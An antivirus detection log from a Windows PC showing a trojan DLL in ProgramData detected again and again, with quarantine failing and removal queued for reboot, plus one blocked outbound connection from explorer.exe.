Detection, 06.12.2014 08:31:15, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:31:24, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:32:45, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:33:28, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:33:31, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:33:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:34:46, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:35:21, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:35:24, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:35:30, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:35:38, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:35:52, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:35:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:36:06, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:36:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:37:26, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:37:54, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, IP, 88.214.193.211, 49882, Outbound, C:\Windows\explorer.exe, 
Detection, 06.12.2014 08:38:10, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:38:15, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:38:26, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:38:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:38:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:39:25, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:39:44, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:39:53, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:40:32, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:40:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:41:09, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:41:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:42:46, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:42:51, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:47:23, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:50:16, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:51:46, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:52:02, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:53:02, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:53:03, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:53:06, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:53:14, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:53:17, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:53:38, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:58:47, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:58:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:58:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:58:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:02, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:07, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:13, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:18, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:24, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:29, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:33, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:40, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:59:48, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:00:17, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:00:29, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:00:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:01:11, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:01:18, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:01:34, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:02:43, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:02:49, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:02:52, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:02:57, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:03:15, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:03:36, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:03:40, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:03:48, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:03:58, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:05:54, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:14:19, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:14:51, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:14:54, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:15:03, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:16:07, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:16:47, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:16:51, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:17:00, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:17:19, finja, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:17:24, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:17:31, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:17:35, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:17:43, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 09:17:47, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Update, 06.12.2014 09:18:00, SYSTEM, FINJA-PC, Scheduler, Malware Database, 2014.12.6.4, 2014.12.6.5, 
Protection, 06.12.2014 09:18:00, SYSTEM, FINJA-PC, Protection, Refresh, Starting, 
Protection, 06.12.2014 09:18:00, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopping, 
Protection, 06.12.2014 09:18:02, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopped, 
Protection, 06.12.2014 09:19:29, SYSTEM, FINJA-PC, Protection, Refresh, Success, 
Protection, 06.12.2014 09:19:29, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Starting, 
Protection, 06.12.2014 09:19:34, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Started, 
Detection, 06.12.2014 09:19:35, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:19:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:19:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:20:42, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:20:47, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:20:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:20:56, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:21:03, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:21:07, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
